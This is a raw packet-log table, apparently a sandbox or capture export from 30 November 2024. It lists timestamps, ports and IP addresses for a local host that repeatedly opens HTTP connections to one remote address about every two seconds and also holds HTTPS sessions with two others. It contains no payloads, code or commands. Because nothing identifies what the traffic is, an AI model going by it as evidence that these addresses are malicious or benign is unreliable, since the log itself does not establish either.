Nov 30, 2024 11:13:35.123045921 CET	49853	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:35.123065948 CET	49853	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:35.243290901 CET	80	49853	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:35.243300915 CET	80	49853	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:36.925482988 CET	80	49853	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:36.925565958 CET	80	49853	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:36.925631046 CET	49853	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:36.925756931 CET	49853	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:36.936717033 CET	49859	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:37.048157930 CET	80	49853	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:37.060597897 CET	80	49859	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:37.060755968 CET	49859	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:37.061934948 CET	49859	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:37.062011957 CET	49859	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:37.181859970 CET	80	49859	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:37.181925058 CET	80	49859	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:39.051615000 CET	80	49859	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:39.051630974 CET	80	49859	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:39.051723003 CET	49859	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:39.052114964 CET	49859	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:39.071980000 CET	49865	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:39.172099113 CET	80	49859	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:39.191998005 CET	80	49865	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:39.192066908 CET	49865	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:39.192209005 CET	49865	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:39.192223072 CET	49865	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:39.313098907 CET	80	49865	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:39.313483000 CET	80	49865	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:41.033102989 CET	80	49865	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:41.033148050 CET	80	49865	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:41.033200979 CET	49865	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:41.033334017 CET	49865	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:41.037738085 CET	49869	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:41.153423071 CET	80	49865	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:41.157671928 CET	80	49869	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:41.157762051 CET	49869	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:41.157958984 CET	49869	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:41.157991886 CET	49869	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:41.277848959 CET	80	49869	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:41.277909994 CET	80	49869	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:42.994563103 CET	80	49869	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:42.994646072 CET	80	49869	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:42.994728088 CET	49869	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:42.994843960 CET	49869	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:42.999183893 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:42.999212980 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:42.999284983 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:42.999620914 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:42.999634981 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:43.114943981 CET	80	49869	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:44.395034075 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:44.395104885 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:44.396581888 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:44.396590948 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:44.396817923 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:44.466403008 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:44.507338047 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:44.904937029 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:44.904957056 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:44.904963970 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:44.904992104 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:44.905039072 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:44.905072927 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:44.905088902 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.069667101 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.105983973 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.105992079 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.106019020 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.106051922 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.106084108 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.127209902 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.127218962 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.127249956 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.127279043 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.127320051 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.152353048 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.152360916 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.152384043 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.152435064 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.152461052 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.181938887 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.181946993 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.181968927 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.182010889 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.182025909 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.307254076 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.307260990 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.307352066 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.318859100 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.318866968 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.318932056 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.337935925 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.337948084 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.338020086 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.352530956 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.352539062 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.352611065 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.363850117 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.363857985 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.363936901 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.377230883 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.377341032 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.387007952 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.387072086 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.509632111 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.509728909 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.518107891 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.518201113 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.525870085 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.525959969 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.533555984 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.533633947 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.543673038 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.543765068 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.551388979 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.551462889 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.559123993 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.559200048 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.566880941 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.566956997 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.577050924 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.577131987 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.584661007 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.584755898 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.593556881 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.593641996 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.601476908 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.601546049 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.606430054 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.606493950 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.606523991 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.606550932 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.612706900 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.612726927 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.612740040 CET	49875	443	192.168.2.4	23.145.40.181
Nov 30, 2024 11:13:45.612746954 CET	443	49875	23.145.40.181	192.168.2.4
Nov 30, 2024 11:13:45.689131975 CET	49881	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:45.809137106 CET	80	49881	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:45.809245110 CET	49881	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:45.809374094 CET	49881	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:45.809393883 CET	49881	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:45.929372072 CET	80	49881	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:45.929387093 CET	80	49881	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:47.602294922 CET	80	49881	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:47.602447987 CET	80	49881	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:47.602499962 CET	49881	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:47.602538109 CET	49881	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:47.609795094 CET	49887	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:47.722481966 CET	80	49881	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:47.729754925 CET	80	49887	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:47.729823112 CET	49887	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:47.730003119 CET	49887	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:47.730045080 CET	49887	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:47.849956036 CET	80	49887	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:47.849994898 CET	80	49887	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:49.522645950 CET	80	49887	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:49.522849083 CET	80	49887	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:49.522919893 CET	49887	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:49.523132086 CET	49887	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:49.542083025 CET	49890	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:49.642961025 CET	80	49887	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:49.662313938 CET	80	49890	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:49.662581921 CET	49890	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:49.662631989 CET	49890	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:49.662646055 CET	49890	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:49.782804966 CET	80	49890	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:49.782815933 CET	80	49890	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:51.422012091 CET	80	49890	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:51.427697897 CET	80	49890	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:51.429121017 CET	49890	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:51.429121017 CET	49890	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:51.436868906 CET	49896	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:51.549068928 CET	80	49890	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:51.556869030 CET	80	49896	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:51.556941986 CET	49896	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:51.558331013 CET	49896	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:51.558353901 CET	49896	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:51.678440094 CET	80	49896	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:51.678498030 CET	80	49896	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:53.395775080 CET	80	49896	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:53.395889044 CET	80	49896	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:53.395941019 CET	49896	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:53.396045923 CET	49896	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:53.424197912 CET	49902	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:53.515949965 CET	80	49896	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:53.544214010 CET	80	49902	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:53.544353962 CET	49902	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:53.544500113 CET	49902	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:53.544539928 CET	49902	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:53.664407969 CET	80	49902	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:53.664509058 CET	80	49902	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:55.339034081 CET	80	49902	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:55.344430923 CET	80	49902	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:55.345805883 CET	49902	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:55.345805883 CET	49902	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:55.349319935 CET	49908	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:55.465792894 CET	80	49902	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:55.469377041 CET	80	49908	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:55.469580889 CET	49908	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:55.469620943 CET	49908	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:55.469635963 CET	49908	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:55.589540958 CET	80	49908	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:55.589567900 CET	80	49908	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:57.270198107 CET	80	49908	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:57.270549059 CET	80	49908	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:57.270617962 CET	49908	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:57.326015949 CET	49908	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:57.443669081 CET	49912	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:57.448033094 CET	80	49908	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:57.565768003 CET	80	49912	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:57.565831900 CET	49912	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:57.566004038 CET	49912	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:57.566135883 CET	49912	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:57.686988115 CET	80	49912	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:57.687486887 CET	80	49912	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:59.350991964 CET	80	49912	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:59.357084990 CET	80	49912	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:59.357155085 CET	49912	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:59.357687950 CET	49912	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:59.381295919 CET	49915	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:59.477587938 CET	80	49912	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:59.501455069 CET	80	49915	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:59.501543999 CET	49915	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:59.501769066 CET	49915	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:59.501805067 CET	49915	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:13:59.621680975 CET	80	49915	189.163.166.52	192.168.2.4
Nov 30, 2024 11:13:59.621706963 CET	80	49915	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:01.340970039 CET	80	49915	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:01.341001034 CET	80	49915	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:01.341053009 CET	49915	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:01.341243029 CET	49915	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:01.346306086 CET	49921	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:01.461103916 CET	80	49915	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:01.467358112 CET	80	49921	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:01.467824936 CET	49921	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:01.467909098 CET	49921	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:01.467921019 CET	49921	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:01.589167118 CET	80	49921	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:01.589180946 CET	80	49921	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:03.218429089 CET	80	49921	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:03.218518019 CET	80	49921	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:03.218591928 CET	49921	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:03.218740940 CET	49921	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:03.225835085 CET	49927	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:03.338684082 CET	80	49921	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:03.345861912 CET	80	49927	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:03.345951080 CET	49927	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:03.346157074 CET	49927	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:03.346194983 CET	49927	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:03.466226101 CET	80	49927	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:03.466249943 CET	80	49927	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:05.094419003 CET	80	49927	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:05.094733000 CET	80	49927	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:05.094798088 CET	49927	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:05.094893932 CET	49927	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:05.101079941 CET	49932	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:05.217745066 CET	80	49927	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:05.221620083 CET	80	49932	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:05.221695900 CET	49932	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:05.221851110 CET	49932	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:05.221868992 CET	49932	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:05.343334913 CET	80	49932	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:05.344007969 CET	80	49932	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:07.246759892 CET	80	49932	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:07.246849060 CET	80	49932	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:07.246905088 CET	49932	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:07.247052908 CET	49932	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:07.255489111 CET	49937	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:07.367266893 CET	80	49932	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:07.375477076 CET	80	49937	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:07.375555992 CET	49937	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:07.375758886 CET	49937	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:07.375781059 CET	49937	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:07.496345043 CET	80	49937	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:07.496392965 CET	80	49937	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:09.165790081 CET	80	49937	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:09.171569109 CET	80	49937	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:09.171650887 CET	49937	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:09.171828985 CET	49937	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:09.175662041 CET	49941	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:09.291863918 CET	80	49937	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:09.295599937 CET	80	49941	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:09.295778990 CET	49941	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:09.295814037 CET	49941	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:09.295829058 CET	49941	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:09.416037083 CET	80	49941	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:09.416090965 CET	80	49941	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:11.135932922 CET	80	49941	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:11.136074066 CET	80	49941	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:11.136133909 CET	49941	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:11.136172056 CET	49941	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:11.145404100 CET	49946	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:11.256122112 CET	80	49941	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:11.265588045 CET	80	49946	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:11.265682936 CET	49946	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:11.306545019 CET	49946	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:11.306545019 CET	49946	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:11.426549911 CET	80	49946	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:11.426609039 CET	80	49946	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:11.867687941 CET	49949	443	192.168.2.4	207.246.75.248
Nov 30, 2024 11:14:11.867718935 CET	443	49949	207.246.75.248	192.168.2.4
Nov 30, 2024 11:14:11.867811918 CET	49949	443	192.168.2.4	207.246.75.248
Nov 30, 2024 11:14:11.868218899 CET	49949	443	192.168.2.4	207.246.75.248
Nov 30, 2024 11:14:11.868230104 CET	443	49949	207.246.75.248	192.168.2.4
Nov 30, 2024 11:14:13.296889067 CET	80	49946	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:13.296952009 CET	80	49946	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:13.297020912 CET	49946	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:13.297283888 CET	49946	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:13.305887938 CET	49953	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:13.417155027 CET	80	49946	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:13.425812006 CET	80	49953	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:13.425889969 CET	49953	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:13.426032066 CET	49953	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:13.426074028 CET	49953	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:13.545979023 CET	80	49953	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:13.546071053 CET	80	49953	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:15.211502075 CET	80	49953	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:15.211560965 CET	80	49953	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:15.211719990 CET	49953	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:15.211853981 CET	49953	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:15.216741085 CET	49959	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:15.332180977 CET	80	49953	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:15.336693048 CET	80	49959	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:15.336791039 CET	49959	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:15.336947918 CET	49959	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:15.336958885 CET	49959	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:15.457818985 CET	80	49959	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:15.457832098 CET	80	49959	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:17.129673004 CET	80	49959	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:17.129772902 CET	80	49959	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:17.129851103 CET	49959	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:17.131385088 CET	49959	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:14:17.251997948 CET	80	49959	189.163.166.52	192.168.2.4
Nov 30, 2024 11:14:56.054718971 CET	443	49949	207.246.75.248	192.168.2.4
Nov 30, 2024 11:14:56.054784060 CET	49949	443	192.168.2.4	207.246.75.248
Nov 30, 2024 11:14:56.054831028 CET	49949	443	192.168.2.4	207.246.75.248
Nov 30, 2024 11:14:56.054841995 CET	443	49949	207.246.75.248	192.168.2.4
Nov 30, 2024 11:14:56.055386066 CET	50046	443	192.168.2.4	207.246.75.248
Nov 30, 2024 11:14:56.055448055 CET	443	50046	207.246.75.248	192.168.2.4
Nov 30, 2024 11:14:56.055511951 CET	50046	443	192.168.2.4	207.246.75.248
